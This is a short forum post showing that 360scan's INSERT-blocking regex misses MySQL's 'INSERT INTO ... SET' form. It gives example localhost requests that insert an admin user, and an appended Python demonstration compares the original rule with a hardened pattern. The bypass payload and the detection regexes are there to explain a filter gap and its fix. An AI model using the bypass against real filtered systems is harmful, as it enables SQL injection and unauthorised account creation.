关注经济金融的壹修 posted on 2014-5-7 11:36:41

Bypassing 360scan's INSERT anti-injection rule with MySQL syntax

360scan regex: INSERT\\s+INTO.+?VALUES
In fact, MySQL can insert data not only with `insert into xxx values`, but also with `insert into xxx set xx = ...`.

Submit:

http://localhost/360.php?sql=insert into user (user,pass) values ('admin','123456')
Submit the SET syntax:

http://localhost/360.php?sql=insert into user set user='admin',pass='123456'
The fix, of course, is best done by adding SET to the rule as well.
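The gap described above, worked through as an added example (not code from the post): the quoted rule is run beside a hardened variant that also covers the SET form, over the two requests from the post. The hardened pattern, the `sql_param` and `scan` helpers and the URL-encoded request strings are this example's own assumptions, not 360scan's actual fix.

```python
import re
from urllib.parse import urlparse, parse_qs

# Rule as quoted in the post (one backslash once PHP string escaping is undone).
ORIGINAL_RULE = re.compile(r"INSERT\s+INTO.+?VALUES", re.IGNORECASE)

# Hardened rule (an assumption of this example, not 360scan's own fix):
# require a table name, allow an optional column list, and accept either
# the VALUES form or the SET form.  DOTALL lets the statement span lines.
HARDENED_RULE = re.compile(
    r"INSERT\s+INTO\s+[`\w.]+\s*(?:\([^)]*\))?\s*(?:VALUES|SET)\b",
    re.IGNORECASE | re.DOTALL,
)


def sql_param(url: str) -> str:
    """Extract and URL-decode the 'sql' query parameter, as 360.php would receive it."""
    qs = parse_qs(urlparse(url).query)
    return qs.get("sql", [""])[0]


def scan(url: str, rule: re.Pattern = HARDENED_RULE) -> bool:
    """Return True if the request's sql parameter matches the INSERT rule."""
    return rule.search(sql_param(url)) is not None


# Constructed requests mirroring the two submissions in the post (URL-encoded).
VALUES_REQ = "http://localhost/360.php?sql=insert%20into%20user%20(user,pass)%20values%20('admin','123456')"
SET_REQ = "http://localhost/360.php?sql=insert%20into%20user%20set%20user='admin',pass='123456'"


def coverage() -> dict:
    """Which rule flags which form; the gap in the original rule is the SET row."""
    return {
        "values/original": scan(VALUES_REQ, ORIGINAL_RULE),
        "set/original": scan(SET_REQ, ORIGINAL_RULE),
        "values/hardened": scan(VALUES_REQ),
        "set/hardened": scan(SET_REQ),
    }


if __name__ == "__main__":
    for name, hit in coverage().items():
        print(f"{name:18} {'BLOCKED' if hit else 'passed'}")
```

Running it prints `set/original passed` while the other three rows are blocked, which is exactly the hole the post demonstrates.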